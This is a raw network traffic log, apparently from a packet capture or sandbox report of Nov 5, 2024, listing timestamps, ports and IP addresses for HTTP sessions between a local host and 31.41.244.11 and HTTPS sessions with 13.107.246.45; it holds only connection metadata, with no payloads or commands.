Nov 5, 2024 18:46:09.569367886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569372892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569386959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569396019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569397926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569411993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569415092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569438934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569447041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569463015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569463015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569489002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569506884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569531918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569550037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569566011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569580078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569582939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569590092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569611073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.569623947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.569664955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570048094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570087910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570096970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570100069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570122957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570136070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570146084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570147991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570163012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570173979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570179939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570194960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570234060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570251942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570265055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570276976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570287943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570293903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570314884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570336103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570872068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570894957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570905924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570919991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570946932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.570974112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570985079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.570997000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571017027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571038008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571131945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571144104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571155071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571165085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571172953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571176052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571187973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571208954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571223974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571237087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571248055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571263075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571274042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571285963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571297884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571331024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571589947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571603060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571619987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571625948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571631908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571649075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571655035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571666002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571671963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571677923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571690083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571722984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571827888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571839094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571851015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571861982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571872950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571872950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571885109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571891069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571897030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571907997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571919918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571919918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571943998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571954966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.571958065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.571995974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.588777065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588799000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588810921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588819981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588829994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588834047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.588848114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.588869095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588879108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588888884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588891983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.588912964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.588932991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588932991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.588943005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588956118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.588980913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589009047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589061975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589078903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589088917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589098930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589108944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589111090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589128017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589157104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589222908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589234114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589245081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589256048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589271069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589274883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589281082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589292049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589293957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589301109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589322090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589346886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589373112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589382887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589406967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589432955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589437008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589447021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589468002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589482069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589709044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589719057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589725018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589752913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589771032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589773893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589788914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589797974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589808941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589814901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589843988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589873075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589883089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589891911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589901924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589916945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589942932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.589970112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.589978933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590007067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590009928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590017080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590022087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590037107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590054989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590080023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590234995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590245962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590261936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590270996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590281010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590289116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590291977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590307951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590329885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590377092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590420008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590445042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590456009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590487003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590497017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590517998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590532064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590543032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590550900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590552092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590562105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590572119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590590000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590614080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590619087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590630054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590657949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590667963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590675116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590681076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590697050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590706110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590709925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590718031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590740919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590744972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590750933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590776920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590805054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590826035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590837002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590847015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590869904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590888977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590912104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590923071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590934992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590954065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590967894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.590989113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.590998888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591012001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591027975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591048956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591059923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591059923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591070890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591092110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591114998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591135979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591145992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591156006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591164112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591180086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591208935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591234922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591244936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591254950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591273069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591299057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591310024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591322899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591331959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591346025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591352940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591363907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591396093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591407061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591415882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591447115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591456890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591475010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591485023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591495991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591520071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591532946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591553926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591613054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591623068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591633081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591658115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591677904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591890097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591900110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591908932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.591927052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591953993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.591983080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592000008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592014074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592024088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592031002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592035055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592039108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592056036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592084885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592104912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592122078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592132092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592142105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592147112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592164993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592169046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592189074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592216969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592250109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592258930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592268944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592293024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592323065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592346907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592356920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592366934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592386961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592420101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592427969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592437983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592447042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592458010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592468023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592469931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592478037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592504978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592506886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592516899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592556000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592560053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592570066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592597961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592617989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592623949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592658997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592683077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592694044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592703104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.592726946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.592751026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.600827932 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.601619005 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.601645947 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.602440119 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.602444887 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.639487028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.639498949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.639508963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.639532089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.639554024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.639570951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.639580965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.639585972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.639622927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.657118082 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.657368898 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.657426119 CET	49815	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.657440901 CET	49815	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.657448053 CET	443	49815	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.672033072 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.672055960 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.672126055 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.672521114 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.672538996 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.688503981 CET	80	49804	31.41.244.11	192.168.2.4
